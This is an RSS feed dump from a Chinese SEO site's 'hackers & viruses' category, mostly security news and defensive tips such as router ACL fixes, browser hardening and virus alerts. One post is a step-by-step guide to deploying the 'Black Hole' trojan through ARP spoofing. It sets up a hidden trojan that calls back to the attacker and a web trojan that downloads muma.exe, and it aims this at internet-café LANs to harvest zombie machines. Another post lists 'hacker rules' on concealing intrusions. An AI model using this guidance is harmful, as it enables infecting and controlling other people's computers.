浙江寻擎SEO团队官方网站 - 黑客&病毒http://www.zyseo.org/浙江SEO,宁波SEO,Google排名,Google优化,英文SEO,外贸网络推广,这里让你领略最新的搜索引擎技术! - RainbowSoft Studio Z-Blog 1.8 Devo Build 80201zh-CN 版权所有 浙江寻擎SEO团队 技术完全保留.Sun, 10 Mar 2013 10:17:59 +0800黑客的社会工程攻击新技术:机遇型攻击null@null.com (zyseo)http://www.zyseo.org/post/488.htmlMon, 21 Feb 2011 10:13:54 +0800http://www.zyseo.org/post/488.html
  时髦的攻击

  作为社会工程攻击的一种,机遇型攻击的切入点往往具备出其不意的特征。事实上,以往发动此类攻击的黑客往往对于国际时事、国内热点问题、以及一些关系国计民生的议题颇感兴趣。

  目前来看,引发今年机遇攻击的两大热点问题主要包括了:北京奥运会和美国总统选举。前者是一次国际瞩目的盛会,后者则是世界上综合国力最强国家的重大变革。

  目前很多安全专家表示,有证据显示进入1月份以来,大量中国和美国的互联网站点被僵尸程序控制,人们担心这是在为日后的机遇攻击储备“弹药”。

  两大热点

  此前Websense 公司安全研究副总裁Dan Hubbard 说:“2008年北京奥运会是一次世界性新闻事件,报道它的网站和网络是病毒感染访问者的潜在地方。”事实上,该公司曾在去年2月份发现了被感染的超级杯球赛网站。Hubbard认为,2008年奥运会将有可能被黑客组织用作欺诈的诱饵,不仅是国际规模,而且金额巨大。

  此外,2008年美国总统大选将为攻击者和骗子们提供另一次吸引人们眼球的机会。Symantec公司新技术主管Oliver Friedrichs说:“在2004年总统选举期间,我们看到了针对Edwards竞选活动的钓鱼攻击。当时还发生了针对Lieberman网站的拒绝服务攻击。”

  Friedrich认为,这次总统选举可能出现的攻击包括犯罪分子或极端主义支持者注册一个模仿政治对手网站的“typo”域名(容易拼错的域名),当有人捐款时,犯罪分子或极端主义支持者要么装进自己的腰包,要么捐献给其他某人的竞选活动。

  技术实现

  许多观察家预测僵尸网络将利用分散式指挥控制结构增加关闭它们的难度,并且将会于Storm攻击进行结合。

  McAfee公司研究员Craig Schmugar说:“Storm攻击确立了一种趋势。我们看到的很多垃圾邮件是通过被Storm感染的机构传播的,而这将成为机遇攻击的传播途径之一。”Schmugar认为,未来几个月内将出现一波“寄生”恶意件浪潮,这类恶意件寻找特定的文件并把自己嵌入在文件中。

  Schmugar说:“我们看到2007年像Philis这样的寄生病毒增加了400%;Virut和具有rootkit特性的Almanahe很活跃。”他指出,为了确保机遇攻击的成功,黑客组织会想尽办法推广各类寄生病毒,只要它们覆盖了好代码,用户就永远不可能再恢复。

  新的变化

  咨询机构SystemExperts公司总裁Jon Gossels说:“在线威胁的来源已经从青少年黑客变为以有组织犯罪、敌对国家政府、工业间谍为主。”

  不过,Gossels认为,对于企业的安全负责人来说,每天的斗争可能集中在取得法规遵从性上。他指出明年国际上至少将推出一项针对应用安全性的新支付卡行业标准。在医疗保健领域中,部分由于美国卫生和福利部第一次开始执法活动并根据投诉征收罚款的原因,将掀起一波实现安全性的新高潮。

  Gossels说:“这些变化在推动人们对防止数据泄露与黑客入侵的更大的关注,这对防御机遇攻击也有好处,事实上2008年人们将不得不更多的关注这些问题。”

]]>
黑客&病毒http://www.zyseo.org/post/488.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=488http://www.zyseo.org/cmd.asp?act=tb&id=488&key=dab75c1a
新的挂马方式 ARP欺骗挂马称雄局域网null@null.com (zyseo)http://www.zyseo.org/post/487.htmlFri, 18 Feb 2011 17:25:20 +0800http://www.zyseo.org/post/487.html
  局域网ARP欺骗挂马的好处如下:无需入侵网站,只要你的主机处于局域网中即可,这是它最大的优点;收获的肉鸡多多,短时间内可以收获数十台甚至上百台肉鸡,类似网吧这样由上百台电脑组成的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中我们的木马。看了上面的介绍,各位是不是已经蠢蠢欲动了?

  第一步:配置木马服务端

  我们以“黑洞”木马为例。运行“黑洞”木马的Client.exe文件,进入Client.exe的主界面后,点击“文件→创建DLL插入版本服务端程序”。

  进入服务端程序的创建界面后,首先勾选“Win NT/2000/XP/2003下隐藏服务端文件、注册表、进程和服务”,然后切换到“连接选项”标签,在“主机”一栏中填入本机的公网IP地址,端口可以保持默认的“2007”。最后在“连接密码”处填入用来连接对方的密码,例如123456(图1)。设置完成后点击“生成”按钮,将木马服务端保存为muma.exe。



填写密码

  第二步:生成网页木马

  既然是挂马,那当然缺不了网页木马了。这里我们用“MS07-33网马生成器”为例。运行“MS07-33网马生成器”,在“网马地址”文本框中输入木马所在路径,由于等会我们要自行架设Http服务,所以这里应该填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本机在局域网中的IP地址。点击“生成网马”按钮即可生成网马hackll.htm(图2)。



点击“生成网马”
]]>
黑客&病毒http://www.zyseo.org/post/487.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=487http://www.zyseo.org/cmd.asp?act=tb&id=487&key=6d36c819
黑客侦察目标的几种常用技术null@null.com (zyseo)http://www.zyseo.org/post/486.htmlThu, 17 Feb 2011 17:32:44 +0800http://www.zyseo.org/post/486.html
  经常有很多令你吃惊的大量的关于你们公司的敏感信息在网络中出现,等待着一些人偶然发现。你曾经为了你的域名搜索过IT论坛吗?试试看吧!技术员工将经常在公共论坛上粘贴问题或者答案,提到在他们公司运行中的特殊设备,他们甚至用到了他们的工作电子邮件地址。哇!很明显,他们没想到黑客会喜欢不用接触到你的网络就可以找出防火墙的类型或者你所属的服务器。为了避免这种情况发生,你应该加强执行一个政策就是要求你的使用者们不要用他们的工作电子邮件地址在公共论坛上注册任何信息,公司的名字也应该被禁止使用。他们仍然可以得到问题的答案,但是你的基础设施的细节就不会被全世界看到。

  另一个黑客寻找你的技术员工信息的地方是IP地址的在线数据库和网站注册。实际上有四个数据库,每个包含一种类型的世界上不同部分的信息。查看在http://www.networksolutions.com或者http://www.ARIN.net上的Whois部分,看是否能看到你公司的域名列表,名称,电子邮件,或你技术员工的电话号码。理想地,你应该提供这些领域中的普通信息,以防止黑客利用这些员工的身份,来迫使你的用户泄漏他们的密码或其他敏感信息。

  一个人的垃圾是另一个人的珍宝!在垃圾桶中搜寻是一种古老的,龌龊的但是仍然富有成效的信息聚集技术,在这种技术中,攻击者仔细查看你的垃圾,寻找社会保障号码,电话号码,使用者ID,IP地址和密码。一个政策应该被加强,就是要求员工销毁含有任何可能被错误使用的信息。如果你真的认为这不必要,那么我鼓励你去查一下在靠近你的网络打印机旁边的垃圾桶的内容,特别在IT领域中。你会把发现物交给一个黑客吗?
]]>
黑客&病毒http://www.zyseo.org/post/486.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=486http://www.zyseo.org/cmd.asp?act=tb&id=486&key=d971a80d
黑客组织计划发布工具 利用谷歌寻找漏洞null@null.com (zyseo)http://www.zyseo.org/post/485.htmlWed, 16 Feb 2011 17:26:30 +0800http://www.zyseo.org/post/485.html
  CDC组织称,这个软件工具名为“谷歌扫描器”(Goolag Scanner),它是一名黑客的杰作,这名黑客使用的名字是“Johnny I Hack Stuff”,该软件工具可以在其网站上免费下载。

  CDC组织表示,“谷歌扫描器”可以帮助那些具备基本编程技术的人扫描网站或域名服务存在的漏洞,从中发现黑客们可以利用的弱点。该组织声称,在对该软件工具的随机测试中,他们在北美、欧洲和中东等地发现了“一些相当可怕的漏洞”。

  CDC组织建议网站的运营人员尽快使用这个工具寻找和修补网站的弱点,以免黑客利用它来进行犯罪和恶意用途。CDC组织的发言人奥克斯布拉德·鲁芬(Oxblood Ruffin)表示,“如果我是一个政府、大企业或者任何一家大型网站,我会下载这个工具,自己测试一下。”

  对此消息,谷歌没有置评。CDC组织于1984在美国成立。

  计算机安全专家发出警告称,任何程序在确定不含恶意代码之前,都不要轻易下载,否则可能反受其害。黑客们通常会引诱人们安装恶意程序,然后套取用户的密码和其它有价值的信息,或者借机接管用户的计算机。
]]>
黑客&病毒http://www.zyseo.org/post/485.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=485http://www.zyseo.org/cmd.asp?act=tb&id=485&key=109c6bea
黑客守则null@null.com (zyseo)http://www.zyseo.org/post/484.htmlTue, 15 Feb 2011 17:35:26 +0800http://www.zyseo.org/post/484.html
  1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦。恶意破坏它人的软件将导致法律责任, 如果你只是使用电脑, 那仅为非法使用。 注意:千万不要破坏别人的文件或数据。

2. 不修改任何系统文件, 如果你是为了要进入系统而修改它, 请在达到目的后将它还原。

  3. 不要轻易的将你要 Hack 的站点告诉你不信任的朋友。

  4. 不要在 bbs/论坛上谈论关于你 Hack 的任何事情。

  5. 在 Post 文章的时候不要使用真名。

  6. 入侵期间, 不要随意离开你的电脑。

  7. 不要入侵或攻击电信/政府机关的主机。

  8. 不在电话中谈论关于你 Hack 的任何事情。

  9. 将你的笔记放在安全的地方。

  10.读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!

  11.已侵入电脑中的帐号不得删除或修改。

  12.不得修改系统文件, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而破坏原有的安全性。

  13.不将你已破解的帐号分享与你的朋友。

  14.不要侵入或破坏政府机关的主机。

]]>
黑客&病毒http://www.zyseo.org/post/484.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=484http://www.zyseo.org/cmd.asp?act=tb&id=484&key=852b3542
什么是黑客?null@null.com (zyseo)http://www.zyseo.org/post/483.htmlMon, 14 Feb 2011 16:56:39 +0800http://www.zyseo.org/post/483.html  但到了今天,黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。对这些人的正确英文叫法是Cracker,有人翻译成“骇客”。




]]>
黑客&病毒http://www.zyseo.org/post/483.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=483http://www.zyseo.org/cmd.asp?act=tb&id=483&key=62e283ef
如何才能有效防范黑客与病毒(1)null@null.com (zyseo)http://www.zyseo.org/post/478.htmlFri, 31 Dec 2010 12:04:31 +0800http://www.zyseo.org/post/478.html安全分析:
  有过路由器配置经验的读者应该知道网络管理员经常通过在路由器或交换机上设置访问控制列表来完成防范病毒和黑客的作用。Cisco出品的路由器或交换机的访问控制列表都默认在结尾添加了“DENY ANY ANY”语句,这句话的意思是将所有不符合访问控制列表(ACL)语句设定规则的数据包丢弃。
  最近笔者所在公司添置了华为的2621系列路由器,一般情况下CISCO和华为设备的配置方法基本相同,所以笔者按照在Cisco路由器上的设置语句制定了ACL规则,并将这些规则输入到华为路由器上。由于CISCO默认自动添加DENY ANY ANY语句,所以笔者也想当然的认为华为路由器也会默认将这个命令添加。然而,在配置后却发现所有ACL过滤规则都没有生效,该过滤的数据包仍然被路由器正常转发。
  经过反复研究、查询资料,笔者发现原来华为公司的访问控制列表在结尾处添加的是“PERMIT ANY ANY”语句,这样对于不符合访问控制列表(ACL)语句设定规则的数据包将容许通过,这样造成了一个严重后果,那就是不符合ACL设定规则的数据包也将被路由器无条件转发而不是Cisco公司采用的丢弃处理,这造成了该过滤的数据包没有被过滤,网内安全岌岌可危。非法数据包绕过了网络管理员精心设置的防病毒“马其诺防线”,从而轻而易举的侵入了用户的内网。
  解决措施:
  如何解决这个问题呢?这个问题是因为华为路由器的默认设置造成的。我们可以在ACL的最后添加上“DENY ANY ANY”语句或将默认的ACL结尾语句设置为DENY ANY ANY.头一种方法仅仅对当前设置的ACL生效,以后设置新ACL时路由器还是默认容许所有数据包通过;而第二种方法则将修改路由器的默认值,将其修改成和CISCO设备一样的默认阻止所有数据包。
  1、ACL规则直接添加法
  在华为设备上设置完所有ACL语句后再使用“rule deny ip source any destination any”将没有符合规则的数据包实施丢弃处理。
  2.修改默认设置法
  在华为设备上使用“firewall default deny”,将默认设置从容许转发变为丢弃数据包。从而一劳百逸的解决默认漏洞问题。因此笔者推荐大家使用第二种方法解决这个默认设置的缺陷问题。
  总结:
  经过这次“马其诺”事件,我们可以发现即使是相同的配置命令,如果厂商不同最好事先查阅一下用户手册(特别注意默认设置),往往默认设置会造成很多不明不白的故障。发现问题以后也不要轻易怀疑设备硬件有问题,应该多从软件及配置命令入手查找问题所在。一个小小的默认设置就将精心打造的防病毒体系完全突破(促销产品 主营产品),所以对于我们这些网络管理员来说每次设置后都应该仔细测试下网络状况,确保所实施的手段得以生效。

]]>
黑客&病毒http://www.zyseo.org/post/478.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=478http://www.zyseo.org/cmd.asp?act=tb&id=478&key=f8b22118
黑客用手提电脑便可操纵飞机null@null.com (zyseo)http://www.zyseo.org/post/477.htmlThu, 30 Dec 2010 10:32:18 +0800http://www.zyseo.org/post/477.html  波音787“梦想”飞机是美国波音公司得意之作,自接受预订以来订单量不断刷新,但美国联邦航空局却对它亮起“红灯”,原因是机上电子娱乐系统存在漏洞,黑客可能通过这一系统侵入飞机控制系统,通过手中键盘操纵飞机。

  航空局暂不授予安全认证

  波音787“梦想”飞机是波音公司自1995年以来推出的首个全新机型,工程人员为它花尽心思。为了让长途飞行的乘客不再无聊,飞机客舱配备先进的电子娱乐系统。旅途中,乘客不仅可以点播影片,还能在数万米高空浏览因特网上的内容。

  然而,正是这种上网功能让波音787遭遇尴尬。美国联邦航空局在上星期作出的一份评估报告中说,乘客娱乐系统由飞行员负责控制,管理终端在驾驶舱内,这样一来,黑客可能通过娱乐系统“黑”掉飞行员操纵的驾驶系统,干扰飞行,危及飞行安全。

  航空局专家在报告中说:“波音787的现有系统让乘客可通过网络接触到以前封闭的数据系统,这一数据系统又与飞行安全保障体系紧密相连。”报告指出,这一情况可能让心怀不轨的人得以通过这一系统侵入飞行系统。

  英国《泰晤士报》说,这一安全隐患意味着,心怀不轨的黑客只需一部手提电脑,就可以安坐在客舱内“劫持”整架飞机。

  虽然报告只是提出了一种可能性,但美国联邦航空局仍决定暂不授予波音787相关安全认证。波音公司需开展技术改造,消除隐患。

  波音787飞机定于今年3月首飞,今年11月或12月开始交付使用。

  重新设计乘客娱乐系统

  航空局报告发布后,波音公司发言人洛里•冈特说,工程人员已重新设计了乘客娱乐系统网络的构架。按照新设计,乘客网络与飞行控制网络之间仍然可能发生数据交换,但设计人员加入了新的安全设计,“确保乘客在任何情况下都不能通过因特网服务终端接触到飞机的维护数据与导航系统”。

  英国《国际飞行》周刊飞行安全版编辑戴维•里尔蒙特说:“美国航空局显然十分在意波音787的安全隐患……黑客可能埋下电脑病毒,扰乱导航系统,航空局可不愿看到能被侵入的飞行控制系统。”

  一些客机飞行员也在专为飞行员开设的网站上留言表达担忧,其中一则留言说:“乘客网络和飞行系统间竟有连接,这太吓人了,任何清醒的人都不会这么做。”

  国际市场青睐波音787

  波音787是波音公司为与空中客车公司竞争而投入巨资研制的客机,专门对抗空客颇受欢迎的A380巨型客机,因此波音公司对787客机十分看重。

  去年7月8日,波音公司为首架正式下线的波音787客机举行盛大庆祝仪式。下线仪式通过卫星向40多个国家实况转播。

  虽被曝出存在网络安全隐患,但波音787多处创新设计仍处于世界先进水平。它是世界上首款主体结构采用碳纤维复合材料制造的大型客机,飞机重量因此变轻,耗油量比同等大小飞机减少20%,同时释放更少温室气体。

  波音公司说,波音787客舱面积相当于一个网球场,可安装的座位数目由210个至330个不等。它引入新型发动机和气体过滤系统,起飞和降落时的噪音比同类飞机低60%,舱内空气质量也得到改善,适宜的湿度和座舱压力有助于缓解乘客疲劳。

  先进的设计理念让波音787在国际市场广受青睐。截至去年12月27日,波音787的全球订单量已达到790架。
]]>
黑客&病毒http://www.zyseo.org/post/477.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=477http://www.zyseo.org/cmd.asp?act=tb&id=477&key=0d0fab49
解决ekrn.exe cpu占用率100%终极解决办法null@null.com (zyseo)http://www.zyseo.org/post/ekrnexejjfa.htmlMon, 22 Jun 2009 09:22:57 +0800http://www.zyseo.org/post/ekrnexejjfa.html在nod32使用过程中,很多朋友抱怨(包括我)ekrn.exe驻留线程容易造成cpu占用率100%的现象。网上好多朋友提出解决方案,但追究其根源,主要是由于“Microsoft update”升级,造成svchost.exe反复重启,nod32屡次查杀造成的。更在某些时候,即使停用nod32,在系统自动升级的时候,则会出现svchost.exe这个线程cpu占用率长时间100%的现象。也就是说,造成cup占用率100%的原因,并不仅仅是nod32造成的。

经观察,出现问题的机器(我在三台电脑上进行试验)都开启了“Microsoft Update”功能(主要是为了方便系统内安装的微软系列软件,如office套件升级)。将此功能关闭,直接使用“window update”进行操作系统补丁升级,则不会出现任何问题。因此,我们可以断定,“Microsoft Update”存在着bug,在微软公司未提供补丁之前,请使用此功能进行自动更新的朋友关闭掉,仅以“window update”进行各种系统补丁的自动升级。根据微软提供的信息,我的电脑安装Eset Nod32 658版本后出现的ekrn.exe占用CPU100%问题的解决方案。

亲自动手,测试成功。

ekrn.exe占用CPU100%时,解决步骤:

1、确定你已经安装了微软官方发布的所有SP2补丁(其中包括有Svchost.exe系列问题的BUG补丁,不是指SP3哈)

2、暂停EAV全部监控。几秒之后,ekrn.exe占用自动降为0%。

3、几秒之后Svchost.exe出现占用CPU100%的现象。

4、打开控制面板==>管理工具==>服务,找到"Automatic Updates",设置成手动启动,然后关闭该服务。

5、清空C:\WINDOWS\SoftwareDistribution 目录下所有的文件。

6、恢复Automatic Updates成自动启动并重启该服务。

7、启动EAV全部监控。

8、你可以重启一次电脑试试看还有无CPU100%的现象,当然你完全可以不用重启电脑而继续工作。

问题分析:

1、ekrn.exe占用CPU100%问题属于该杀毒软件在查杀系统进程时的正常现象,因为Svchost.exe不断重启运行导致,这个是WIN系统BUG,与杀软件无关,所以不用更改杀软任何设置。

2、(转载)造成svchost占系统CPU 100%的原因并非svchost服务本身:以上的情况是由于Windows Update服务下载/安装失败而导致更新服务反复重试造成的。而Windows的自动更新也是依赖于svchost服务的一个后台应用,从而表现为svchost.exe负载极高。 常发生这类问题的机器一般是上网条件(尤其是去国外网站)不稳定的机器。

]]>
黑客&病毒http://www.zyseo.org/post/ekrnexejjfa.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=445http://www.zyseo.org/cmd.asp?act=tb&id=445&key=fc37b074
全方位封杀网页病毒null@null.com (zyseo)http://www.zyseo.org/post/fengshawybd.htmlThu, 18 Dec 2008 16:52:51 +0800http://www.zyseo.org/post/fengshawybd.html在所有的病毒传播的途径中,利用网页传播病毒的危害是最大的。稍不留神,就可能中招。其实,我们完全可以变被动的查杀为主动的防范,做到防患于未然。

一、屏蔽指定网页

对于一些包含恶意代码的网页,在知道其地址的情况下,我们可以将其屏蔽掉。启动IE浏览器后,打开“工具”菜单下的“Internet选项”命令,将打开的窗口切换到“内容”选项卡,在“分级审查”中单击“启用”按钮,将打开的“内容审查程序”窗口切换到“许可站点”选项卡,然后在“允许该站点”中输入其地址并单击“从不”按钮将其添加到拒绝列表中即可。

二、提高安全级别

由于网页病毒很多都是通过包含恶意脚本来实现攻击的,因此我们首先可以采取提高IE安全级别的方法来防范。

将前面打开的Internet窗口切换到“安全”选项卡,然后单击“自定义级别”按钮打开“安全设置”窗口,将“ActiveX控件和插件”、“脚本”下的所有选项,都尽可能的设为“禁用”,同时将“重置自定义设置”设为“安全级-高”即可。

三、确保WSH安全

很多网页会利用VBscript编制病毒,它们利用Windows自带的Windows Scripting Host激活运行。对此,我们可以采取卸载系统自带的WSH或将其升级来防范这类病毒的横行。

如果是Windows 9X系统,那么只要打开“添加/删除程序”项,然后通过修改Windows组件,把“附件”项中的“Windows Scripting Host”取消即可;如果是Windows 2000/XP操作更加简单,只需要打开文件夹选项窗口,然后在“文件类型”选项卡,找到“VBS VBScript Script File”选项并将其删除即可。

另外我们也可以通过到微软网站下载安装最新的WSH,这样也可以在一定程度上避免VBscript病毒的运行。

四、禁止远程注册表服务

通常情况下,我们是不需要启动远程注册表服务的,因为很多恶意网页病毒是通过修改注册表来达到自己的目的,因此我们可以将该服务关闭。进入控制面板,在“管理工具”文件夹中打开“服务”项,然后双击右侧的“Remote Registry”,将其启动类型设为“已禁用”,并单击“停用”按钮即可。

要预防网页病毒对自己的侵害,除了做好上面的保护工作之外,还必须养成良好的使用习惯,有条件的应当安装防火墙和杀毒软件,这样也可以在一定程度上阻拦网页脚本程序的运行。

]]>
黑客&病毒http://www.zyseo.org/post/fengshawybd.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=401http://www.zyseo.org/cmd.asp?act=tb&id=401&key=3619b42c
一种将百度指向谷歌的病毒及其解决方案null@null.com (zyseo)http://www.zyseo.org/post/baiduzhixianggoogle.htmlWed, 10 Dec 2008 17:13:44 +0800http://www.zyseo.org/post/baiduzhixianggoogle.html今天上午10点左右在网上搜索资料时,无意中发现无论是从哪个途径进入百度的主页,

均是闪烁一两秒后便指向谷歌中国的主页,而使用雅虎、搜狗等搜索很正常。

这就是说并不是百度的主页被黑改成了谷歌中国的页面。

那么只有一种可能性, 就是目前网络上存在一种病毒专门将百度指向谷歌。

如果是真的,这样的事又倒底是谁做的呢?
重庆商报消息,“今天用百度搜索的时候,总要跳转到Google,怎么回事?在地址栏输入百度又是正常的。”昨日在遨游浏览器的论坛上看到这样一个求助帖。随后又在百度贴吧等各大论坛了解到,大量四川地区用户都在发帖议论此事。

据四川地区的网友描述,自己通过正常途径在浏览器上安装了百度搜索工具栏,前几天使用这个功能还是正常的,后来莫名其妙的就突然出现了这样的现象。有网友表示,跳转到Google的页面中居然还包含一个Google adsense的广告,令人非常气愤。有网友爆料,目前有一种病毒能够将百度指向Google,并在论坛中给出解决方法。也有网友质疑是有人故意作恶。昨日就此情况在我市范围内调查,尚未发现类似情况。

家里电脑中了木马,ie主页被强制修改了,重启IE自动改。打开百度主页,搜索指向谷歌,但傲游正常。用360查不出,用卡卡查到三个木马文件,删除后不再出现。但ie仍有问题。问现在电脑里是否还有木马程序?有没有被盗帐号的危险?是不是只要把ie问题改好就没事了?

问题1:强行修改主页问题.
先删除你桌面上的IE图表,再找你的IE目录(一般都在C:\Program Files\Internet Explorer)。把IEXPLORE.EXE发送到桌面,右键点IEXPLORE.EXE属性,目标那一栏最后空一格加你要设置的主页网址(比如"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.baidu.com)。记住目标栏最后要加空一格再输网址。这样你的主页就永远不会被改

问题2:自动跳GOOGLE问题.
打开 Internet选项(就是右键桌面的浏览器图标,点属性) 程序 加载器 {9A568672-D437-469E-86C2-F6E4A115607}给它禁止了。重新点开浏览器 就OK了
大括号里的可能不一样,反正就是数字和字母组成的就对了.

]]>
黑客&病毒http://www.zyseo.org/post/baiduzhixianggoogle.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=397http://www.zyseo.org/cmd.asp?act=tb&id=397&key=9e1caf86
毒王来了:超级AV终结者null@null.com (zyseo)http://www.zyseo.org/post/chaojiAVzjz.htmlThu, 04 Dec 2008 09:58:34 +0800http://www.zyseo.org/post/chaojiAVzjz.html近日,金山毒霸全球反病毒监测中心发现一种新的病毒出现在互联网上,该病毒结合了AV终结者、机器狗、扫荡波、autorun病毒的特点,行为极其恶劣。目前,据初步统计该病毒已经造成十万用户以上用户受害,无疑是今年目前为止所发现最凶猛的病毒之一。

据金山毒霸反病毒专家李铁军介绍,这种名为“超级AV终结者”(Win32.TrojDownloader.NsPassT.bm.50688)的病毒,是最近被反病毒工程师捕获的新型计算机病毒,它对用户具有非常大的威胁。它通过微软近期曝光的最大漏洞MS08067在局域网传播,并带有机器狗的穿还原功能,下载大量的木马,对网吧和局域网用户影响极大。

李铁军分析指出,一旦感染该病毒,最明显的表现是杀毒软件无法打开,或者杀毒后无法使用粘贴、复制功能。用户在浏览页面时,将不断弹出广告窗口。同时,局域网用户会发现杀毒软件报毒,而实际却并未中毒。这是因为病毒的ARP攻击频率达到令人惊讶的地步,高达每分钟1万次以上,在三分钟不到的时间里,就能阻塞由数百台电脑组成的局域网。当攻击达到最高峰时,电脑甚至连病毒作者自己指定的网址也无法访问,这种现象可谓是疯狂至极。

据了解,“超级AV终结者”的危害性主要体现在它强大的对抗能力。由于同时综合了 AV终结者、机器狗、扫荡波的特点,从未有任何病毒的对抗能力像此毒一样凶猛。该病毒执行后会绕过系统还原软件将病毒体写入系统文件,即使还原系统仍不能清除病毒。同时,它按照自带的一份“黑名单”搜索安全软件,只要发现用户安装得有安全软件,就调将其关闭。经检查,它的“黑名单”异常庞大,几乎所有网上能搜索到的安全软件,都是该毒的关闭目标。

针对该毒的高危特性和频繁更新,反病毒专家推荐用户使用免费的金山系统急救箱 )对系统进行清理。同时使用永久免费的金山清理专家打全补丁,特别是微软MS08-067漏洞,彻底断绝病毒、木马的传播途径。

]]>
黑客&病毒http://www.zyseo.org/post/chaojiAVzjz.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=394http://www.zyseo.org/cmd.asp?act=tb&id=394&key=48855b7b
微软黑屏破解方法a@b.com (liberty)http://www.zyseo.org/post/weiruanheipingpojie.htmlMon, 20 Oct 2008 12:33:59 +0800http://www.zyseo.org/post/weiruanheipingpojie.html
微软宣布20号起黑屏警告XP专业版盗版用户!!




此次新推出的WGA通知为微软WGA项目持续推进的新一轮投放,只针对Windows XP专业版的用户,帮助用户验证其PC上安装的Windows XP是否为正版且获得适当许可。 而OGA通知是微软针对中国Office用户的首次发布,覆盖了Office XP、Office 2003和Office 2007套件的全部用户。  WGA通知和OGA通知均是可选择式的服务。 用户可以通过微软更新(Microsoft Update)站点或自动跟新 (Auto Update) 选择下载安装、经过验证过程后了解自己使用的Windows XP或 Office产品是否为正版并获得了相应的授权。

  验证通过的用户直接使用Windows XP或Office程序即可。对于因不同原因未通过验证的用户,将收到相应的系统通知。如:产品未激活或使用试用版下的“未激活验证失败”;因同步超时等原因引起的“验证无法完成”;或“非正版验证失败”。

  如果Windows XP用户没有通过正版验证,将会体验到:

   用户开机进入后,桌面背景变为纯黑色,用户可以重新设置桌面背景,但是每隔60分钟,桌面背景将重新变回黑色。黑色桌面背景不会影响计算机的功能或导致关机。

   用户登录时, 会看到一个登录中断的对话框,并在屏幕的右下角会出现一个永久通知和持续提醒的对话框显示“您可能是软件盗版的受害者”等提示信息。
   较之前的WGA通知,移除了安装向导,简化了安装程序,提供给客户一个更流畅的安装体验。另外,新的EULA将允许用户在未来能够自动接收WGA的更新。这是正版用户体验的一个提升,他们将不用再点击安装未来的WGA更新。

  如果Office用户没有通过正版验证,用户体验将分为三个阶段:

   验证失败后的第1-14天内,将有一个弹出式对话框提醒客户,他们运行的Office 软件不是正版,并引导客户采取行动。在转化成正版Office之前,客户将在每天首次打开Office软件和此后2小时分别收到一次对话框提醒

   从验证失败后的第15天开始,如果客户还是没有转成正版,对话框将继续出现,不过提示信息会有所变化,告知用户如不采取行动,将在14天后(即验证失败后的第30天后),Office软件被添加视觉标记。

   客户在收到这些对话框通知30天后,如果还是没有采取行动转成正版,那么在Office软件的Word、Excel,PowerPoint 和Outlook程序的菜单栏中将被添加视觉标记,提醒用户该Office软件副本不是正版,每次客户打开这四个程序,都会看到相应提醒标记。

此次WGA通知和OGA通知今年早些时候在其他一些国家和地区已经分批启动
另:请大家把windows里的自动更新关闭
]]>
黑客&病毒http://www.zyseo.org/post/weiruanheipingpojie.html#commenthttp://www.zyseo.org/http://www.zyseo.org/feed.asp?cmt=367http://www.zyseo.org/cmd.asp?act=tb&id=367&key=57f2933f
Google"出丑" 处理大数字运算竟算错答案?null@null.com (zyseo)http://www.zyseo.org/post/googlechuchou.htmlFri, 29 Aug 2008 12:35:06 +0800http://www.zyseo.org/post/googlechuchou.html Google的计算机在处理大数字时竟然会算错。这个问题在电脑界并非前所未闻,但对于一家以巨大无比的数字为名,且宅人群聚的公司而言,连算数都会错实在很糗。

错误通常是发生在非常大的数字,如2,999,999,999,999,999减2,999,999,999,999,998应该等于1,但Google计算机却显示答案为0。

算错的状况并非一致。1,999,999,999,999,999减1,999,999,999,999,995,答案是错误的0,但1,999,999,999,999,999减1,999,999,999,999,993可正确得出6。而400,000,000,000,002减400,000,000,000,001又得出错误的0,但400,000,000,000,002减400,000,000,000,000却是正确答案2。

幸灾乐祸者最觉得好笑的地方,是用Google这个名称的加减算数,得到的结果也是错的。英文字googol的原意代表1后面加上100个零。一个googol加1再减一个googol,正确答案是1,Google计算机的解答是错误的0。

事实上,大数字的算术的确很难,当中涉及特别的数字加密方法,才能得到绝对准确的答案。所幸,一般的计算机制造商不会碰到这些问题,因为如此大的计算通常只用在天文学计算星体的距离;太过细微的结果,在现实世界中其实没什么意义。

大数字的表现方式通常是两段的小数点格式,部分小数字(假数)乘以10的若干次方(指数)。举例来说,Google第二季的营收为12.5亿美元,或1,250,000,000美元,或1.25美元乘以10的9次方,或.25 x 10^9。小数点算术很适用于非常大的数字,但通常假数部分只保留一定数位,其他部分则忽略。

电脑的数学是二进位,只有0或1,人脑则是十进位,数字从0到9。当电脑将数字转换成二进位计算,再把结果转回人们习惯的十进位,准确度的确可能出问题。事实上,即使运算技术已经发展数十年,在最新的旗舰Power6处理器推出之前,连IBM都无法让电脑实际执行十进位计算。

一般的计算机根本无法处理太大的数字。当然,Google或许出糗了,但大部分的手持计算机根本不会让你输入1,999,999,999,999,993这种数字,更别说计算了。而Wolfram Research Mathematica这种可以精准计算的专业软件,市场也不大。

如果Google必须主动侦测大数字的计算,再将工作送到设有更先进预算规则的服务器执行,可能会明显降低计算机功能的速度。而Google把重点放在服务器回应是正确的,因为搜索引擎越快,使用者搜索的越多。但这个问题是Google核心文化与形象的一部份,Google的算数出错,就好比政客身上披了一面图案有错的国旗。

